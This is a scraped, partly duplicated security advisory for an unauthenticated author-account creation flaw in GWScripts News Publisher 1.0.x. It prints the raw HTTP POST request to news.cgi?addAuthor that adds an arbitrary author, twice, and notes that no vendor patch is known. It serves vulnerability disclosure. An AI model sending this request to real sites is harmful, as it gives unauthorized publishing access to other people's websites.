GWScripts News Publisher author.file Write Vulnerability
BID:1621
Info
GWScripts News Publisher author.file Write Vulnerability
| Bugtraq ID: | 1621 |
| Class: | Origin Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Aug 29 2000 12:00AM |
| Updated: | Aug 29 2000 12:00AM |
| Credit: | Posted to Bugtraq by n30 <[email protected]> on August 29, 2000. |
| Vulnerable: |
GWScripts News Publisher 1.0 6 GWScripts News Publisher 1.0 5b GWScripts News Publisher 1.0 5a GWScripts News Publisher 1.0 5 |
| Not Vulnerable: | |
Discussion
GWScripts News Publisher author.file Write Vulnerability
It is possible for a remote user to add an author to the author index (author.file) in GWScripts News Publisher, a web news publisher. This can be done by requesting the following raw HTTP request using any arbitrary username and password:
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: user/browser
Host: target
Referer: http://target/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71
author=<username>&apassword=<password>&email=<email address>&name=<username>&password=<password>
It is possible for a remote user to add an author to the author index (author.file) in GWScripts News Publisher, a web news publisher. This can be done by requesting the following raw HTTP request using any arbitrary username and password:
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: user/browser
Host: target
Referer: http://target/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71
author=<username>&apassword=<password>&email=<email address>&name=<username>&password=<password>
Exploit / POC
GWScripts News Publisher author.file Write Vulnerability
n30 <[email protected]> has released the following exploit:
n30 <[email protected]> has released the following exploit:
Solution / Fix
GWScripts News Publisher author.file Write Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
GWScripts News Publisher author.file Write Vulnerability
References:
References:
- News Publisher Homepage (GWScripts)